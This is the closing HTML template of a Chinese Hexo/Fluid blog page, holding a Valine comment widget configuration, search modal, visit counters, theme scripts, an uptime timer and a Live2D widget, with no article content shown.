              <!-- Comments -->
              <article class="comments" id="comments">
                
                
  <div id="vcomments"></div>
  <script type="text/javascript">
    function loadValine() {
      addScript('https://cdn.jsdelivr.net/gh/HCLonely/Valine@latest/dist/Valine.min.js', function () {
        new Valine({
          el: "#vcomments",
          app_id: "2rPljbm5WOxA9BCPXqy3VE5y-gzGzoHsz",
          app_key: "SCoIn2Qp99a7ITtPhkAi6Chw",
          placeholder: "说点什么吧~~~",
          path: window.location.pathname,
          avatar: "retro",
          meta: ["nick","mail","link"],
          pageSize: "10",
          lang: "zh-CN",
          highlight: true,
          recordIP: false,
          serverURLs: "",
          master: "4cd096660a71d786a2a4d9d0bb4e8996",
          friends: "b275f0fc8103331da645a878cf60f841",
          tagMeta: ["博主","友人","访客"],
        });
      });
    }
    waitElementVisible('vcomments', loadValine);
  </script>
  <noscript>Please enable JavaScript to view the <a href="https://valine.js.org" target="_blank" rel="nofollow noopener noopener">comments
      powered by Valine.</a></noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->

  <div class="col-lg-7 mx-auto nopadding-md">
    <div class="container custom post-content mx-auto">
      <img src="https://octodex.github.com/images/jetpacktocat.png" srcset="/img/loading.gif" class="rounded mx-auto d-block mt-5" style="width:150px; height:150px;">
    </div>
  </div>


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '#post-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "adworld&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: true,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
      icon: "§"
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>












  

  

  

  

  

  



<div class="text-center py-1">   
  <div>
    <span>Copyright © 2020</span></a>
    <a href="http://sunzy.icu/" target="_blank" rel="nofollow noopener">
     <span>my blog</span></a>    <br>
  </div>
<div>
  <span id="timeDate">载入天数...</span>
  <span id="times">载入时分秒...</span>
  <script>
  var now = new Date();
  function createtime(){
      var grt= new Date("03/02/2020 00:00:00");//此处修改你的建站时间或者网站上线时间
      now.setTime(now.getTime()+250);
      days = (now - grt ) / 1000 / 60 / 60 / 24;
      dnum = Math.floor(days);
      hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum);
      hnum = Math.floor(hours);
      if(String(hnum).length ==1 ){
          hnum = "0" + hnum;
      }
      minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
      mnum = Math.floor(minutes);
      if(String(mnum).length ==1 ){
                mnum = "0" + mnum;
      }
      seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
      snum = Math.round(seconds);
      if(String(snum).length ==1 ){
                snum = "0" + snum;
      }
      document.getElementById("timeDate").innerHTML = "🚀 for&nbsp"+dnum+"&nbspdays";  //此次自定义显示内容
      document.getElementById("times").innerHTML = hnum + "&nbsphr&nbsp" + mnum + "&nbspmin&nbsp" + snum + "&nbspsec";
  }  //此次自定义显示内容
  setInterval("createtime()",250);
  </script>
</div>

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false},"log":false});</script></body>
</html>
